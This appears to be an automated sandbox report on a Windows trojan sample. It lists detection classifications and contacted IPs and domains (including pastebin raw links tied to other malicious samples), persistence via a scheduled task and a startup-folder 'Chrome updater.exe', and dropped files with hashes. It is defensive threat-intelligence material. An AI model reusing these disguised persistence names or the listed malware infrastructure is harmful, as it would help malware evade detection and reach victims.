Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.mine.winEXE@37/49@16/12
EGA Information: Failed
HDC Information:
• Successful, ratio: 26% (good quality ratio 25.3%)
• Quality average: 82.5%
• Quality standard deviation: 25.9%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 104.43.193.48, 92.122.145.220, 104.42.151.234, 23.218.208.56, 2.20.142.210, 2.20.142.209, 51.103.5.186, 104.26.12.31, 172.67.75.172, 104.26.13.31, 88.221.62.148, 152.199.19.161
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ie9comview.vo.msecnd.net, updates.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, cs9.wpc.v0cdn.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
09:11:19 | API Interceptor | 1x Sleep call for process: 8TD8GfTtaW.exe modified
09:11:29 | Task Scheduler | Run new task: Windows Service Microsoft Corporation path: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
09:12:15 | API Interceptor | 167x Sleep call for process: nulhfhsi.exe modified
09:12:52 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
104.23.99.190 | u6Wf8vCDUv.exe | malicious | pastebin.com/raw/BCAJ8TgJ
104.23.99.190 | Recept.exe | malicious | pastebin.com/raw/BCAJ8TgJ
104.23.99.190 | 7fYoHeaCBG.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | r0QRptqiCl.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | JDgYMW0LHW.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | kigAlmMyB1.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | 5T4Ykc0VSK.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | afvhKak0Ir.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | 1KITgJnGbI.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | DovV3LuJ6I.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | 66f8F6WvC1.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | PxwWcmbMC5.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | XnAJZR4NcN.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | uqXsQvWMnL.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | I8r7e1pqac.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | VrR9J0FnSG.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | dEpoPWHmoI.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | zZp3oXclum.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | aTZQZVVriQ.exe | malicious | pastebin.com/raw/XMKKNkb0
104.23.99.190 | U23peRXm5Z.exe | malicious | pastebin.com/raw/XMKKNkb0
193.0.6.135 | kmU6NKmBPV.exe | malicious |
193.0.6.135 | AHfG1a8jFs.exe | malicious |
193.0.6.135 | ydQ0ICWj5v.exe | malicious |
193.0.6.135 | r4yGYPyWb7.exe | malicious |
193.0.6.135 | aif9fEvN5g.exe | malicious |
193.0.6.135 | ProtonVPN.exe | malicious |
193.0.6.135 | bZ9avvcHvE.exe | malicious |
193.0.6.135 | CmJ6qDTzvM.exe | malicious |
193.0.6.135 | RRLrVfeAXb.exe | malicious |
193.0.6.135 | m3eJIFyc68.exe | malicious |
193.0.6.135 | Dmjsru7tdt.exe | malicious |
193.0.6.135 | 5FKzdCQAY0.exe | malicious |
193.0.6.135 | mq28SXD6jb.exe | malicious |
193.0.6.135 | w4XSMSClXm.exe | malicious |
193.0.6.135 | UJuYMehogg.exe | malicious |
193.0.6.135 | ITZ5fvovia.exe | malicious |
193.0.6.135 | BcSLaQV3wf.exe | malicious |
193.0.6.135 | 45EUwtDW2Q.exe | malicious |
193.0.6.135 | Q8XSs7tx9Y.exe | malicious |
193.0.6.135 | VYTqKrm2vw.exe | malicious |

Domains

Match | Associated Sample Name / URL | Detection | Context
ianawhois.vip.icann.org | kmU6NKmBPV.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | AHfG1a8jFs.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | ydQ0ICWj5v.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | r4yGYPyWb7.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | aif9fEvN5g.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | ProtonVPN.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | bZ9avvcHvE.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | CmJ6qDTzvM.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | RRLrVfeAXb.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | m3eJIFyc68.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | 7E6gDkEV97.exe | malicious | 192.0.47.59
ianawhois.vip.icann.org | Dmjsru7tdt.exe | malicious | 192.0.47.59
                                                                                                                                                            5FKzdCQAY0.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.0.47.59
                                                                                                                                                            mq28SXD6jb.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.0.47.59
                                                                                                                                                            w4XSMSClXm.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.0.47.59
                                                                                                                                                            UJuYMehogg.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.0.47.59
                                                                                                                                                            ITZ5fvovia.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.0.47.59
                                                                                                                                                            BcSLaQV3wf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.0.47.59
                                                                                                                                                            45EUwtDW2Q.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.0.47.59
                                                                                                                                                            HkWufxDsbJ.exeGet hashmaliciousBrowse
                                                                                                                                                            • 192.0.47.59
                                                                                                                                                            bitbucket.org9966HSw7WJ.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            PbuEyOavb0.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            SecuriteInfo.com.Trojan.PWS.Siggen2.61222.12968.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            tyxCV1ouryr7.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            9oUx9PzdSA.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            Symptomaticshon5.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            atikmdag-patcher 1.4.7.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            monthly financial statement.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            contrato-transferencia.docmGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            ordem-de-comprajk.docmGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            Curriculo Laura.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            Curriculo Laura.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            prints-eduardo-bolsonaro.docmGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            Curriculo Laura.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            prints carlos bolsonaro.docmGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            prints carlos bolsonaro.docmGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            prints carlos bolsonaro.docmGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            atikmdag-patcher 1.4.8.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            Xeron_Scan2021002111002.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.192.141.1

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                            SecuriteInfo.com.Trojan.Inject4.6572.13919.exeGet hashmaliciousBrowse
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            Order.exeGet hashmaliciousBrowse
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            ORDER PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ecrypted.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            PO-735643-SALES.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            SecuriteInfo.com.Mal.Generic-S.15142.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            LIQUIDACION INTERBANCARIA 02_22_2021.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            muOvK6dngg.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            SKBM 0222..exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            Vessel Line Up 7105082938.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            ProtonVPN.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            PO 86540.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            RTM DIAS - CTM.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            uTorrent.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            hreheh.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            JFAaEh5hB6.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            Dmjsru7tdt.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            Documents_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            BANK SWIFT- USD 98,712.00.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            BMfiIGROO2.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            dwg.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            Q8XSs7tx9Y.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52
                                                                                                                                                            VYTqKrm2vw.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.23.99.190
                                                                                                                                                            • 104.192.141.1
                                                                                                                                                            • 104.21.67.51
                                                                                                                                                            • 88.99.66.31
                                                                                                                                                            • 172.67.213.210
                                                                                                                                                            • 52.217.107.52

Dropped Files

Match                                                        Associated Sample Name / URL                            Detection
C:\Users\user\AppData\Local\Temp\nsx24D0.tmp\KSRDY0PL.dll    FG1eBAAwpR.exe                                          malicious
                                                             8XioA9UTsz.exe                                          malicious
                                                             8XioA9UTsz.exe                                          malicious
                                                             SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe    malicious
                                                             Build1.exe                                              malicious
                                                             Build.exe                                               malicious
                                                             s3X615I7Qn.exe                                          malicious
                                                             DIGFK6SFVU.exe                                          malicious
                                                             Cess5ioLRO.rtf                                          malicious
                                                             svchost.exe                                             malicious
                                                             svchost.exe                                             malicious
                                                             ServHelp.msi                                            malicious
                                                             ServHelp.msi                                            malicious
                                                             FILE-71421.exe                                          malicious
C:\Users\user\AppData\Local\Temp\hello_C# (2).exe            SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe    malicious
C:\Users\user\AppData\Local\Temp\hello_C#.exe                SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe    malicious

                                                                                                                                                                                            Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hello_C# (2).exe.log
Process: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 660
Entropy (8bit): 5.390020766762198
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPTxAI51KDLI4MN5P6D1BakvoDLI4MWuPak2kL0nk7v:ML9E4KrL1qE4GiD0E4KeGj
MD5: ED176F7B2A92AFE2E5D2FE638497B180
SHA1: AC0CE61B4C1398CE766F3C34269C7B6AEDE78926
SHA-256: 08EDDC037583A4B1815D4FBC4A4CA7356BF81A7F7D5E72F1EBA6289474D94B65
SHA-512: A83D3A4E144576DB06390142ECAF7527D858635FA5DF9CD6ABB7DA67CA91D8647216088023E9C79A06D1DC6BCAE380DE11175B2DA85A5C44E1ABBAB0330BCB06
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hello_C#.exe.log
Process: C:\Users\user\AppData\Local\Temp\hello_C#.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 660
Entropy (8bit): 5.390020766762198
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPTxAI51KDLI4MN5P6D1BakvoDLI4MWuPak2kL0nk7v:ML9E4KrL1qE4GiD0E4KeGj
MD5: ED176F7B2A92AFE2E5D2FE638497B180
SHA1: AC0CE61B4C1398CE766F3C34269C7B6AEDE78926
SHA-256: 08EDDC037583A4B1815D4FBC4A4CA7356BF81A7F7D5E72F1EBA6289474D94B65
SHA-512: A83D3A4E144576DB06390142ECAF7527D858635FA5DF9CD6ABB7DA67CA91D8647216088023E9C79A06D1DC6BCAE380DE11175B2DA85A5C44E1ABBAB0330BCB06
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8TD8GfTtaW.exe.log
Process: C:\Users\user\Desktop\8TD8GfTtaW.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 847
Entropy (8bit): 5.35816127824051
Encrypted: false
SSDEEP: 24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
MD5: 31E089E21A2AEB18A2A23D3E61EB2167
SHA1: E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
SHA-256: 2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
SHA-512: A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nulhfhsi.exe.log
Process: C:\Users\user\AppData\Local\nulhfhsi.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2599
Entropy (8bit): 5.332456341785073
Encrypted: false
SSDEEP: 48:MxHKXwYHKhQnogLHqHDfHK7HKdHKBSTHaAHKzvRtHoxHImHKhBHKoHaHZHG1qHjY:iqXwYqhQnogLKTq7qdqslqzJtIxHbqLd
MD5: B5A02A14896503A67135C039AD71B3A1
SHA1: B7D7128A26413AB610E4043927F1F8A3FC464350
SHA-256: E003A2AF68E8FFA0A60BC477B36B3C32DBC483B42D767B96FFF9F7FDEF84AF35
SHA-512: 0AF38B06DA9A880F5B3E4C1254D094388BD6608A94809AC80E9F14FE0557A695DE03F0187EB5B43861D79E176406A0E1948FE611332D8DBD56043F508BCF36AE
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runt

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{604B4475-75FA-11EB-90E5-ECF4BB570DC9}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 21592
Entropy (8bit): 1.7555123810813766
Encrypted: false
SSDEEP: 48:IwsGcprZGwpLVQG/ap8VEbGIpcVESlGvnZpvVES7d1GoR7/Cqp9VES7Vd8Go497l:rwZTZs2YWCtJrbfXnRyKMyak
MD5: 3C05E7ECE8F462293D93F71B6CD44B64
SHA1: 95BEE310F27B4E47DE974BC199418904150A0EAC
SHA-256: C439D2C13E7014A50DA8980E877C52452A183BBEC70726E3F5142528F53ED60E
SHA-512: 7AC1E17EED320A36AD078BF25C038507E5D44708FE5AF42DA3CD7BB278AE2C191F9F59331C6FAB19502A9834574CF4C651BD15998AD7091CD3956213E530ADC5
Malicious: false

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{604B4477-75FA-11EB-90E5-ECF4BB570DC9}.dat
Process: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Category: dropped
Size (bytes): 24636
Entropy (8bit): 1.725989812102086
Encrypted: false
SSDEEP: 96:rcZfbQka6i2BS9jx2VfWVBMVJO72++TyL2zg:rcZDQL6Nk9jx2VfWVBMVJO72Hg
MD5: 9FEE21A257E930FB6B2A4D62E09672FE
SHA1: 108B5D149C569034C397F1B349230B0623A6D608
SHA-256: A8C9BD58A4728812F73BF4CAAB19593BD98B43F7F25EC33FDBD042668230AEF1
SHA-512: 970B5FF6BCF40E240BB4C3E2522989BB571933F90910CF6849FBA5FC1DF6FC5319FD0CE507329BE4FA7A773AD9440F2D9D3D3C8C20DB3F7FECCAD950BE2BCB16
Malicious: false

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\errorPageStrings[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: downloaded
Size (bytes): 4720
Entropy (8bit): 5.164796203267696
Encrypted: false
SSDEEP: 96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5: D65EC06F21C379C87040B83CC1ABAC6B
SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious: false
IE Cache URL: res://ieframe.dll/errorPageStrings.js
Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\dnserror[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: downloaded
Size (bytes): 2997
Entropy (8bit): 4.4885437940628465
Encrypted: false
SSDEEP: 48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5: 2DC61EB461DA1436F5D22BCE51425660
SHA1: E1B79BCAB0F073868079D807FAEC669596DC46C1
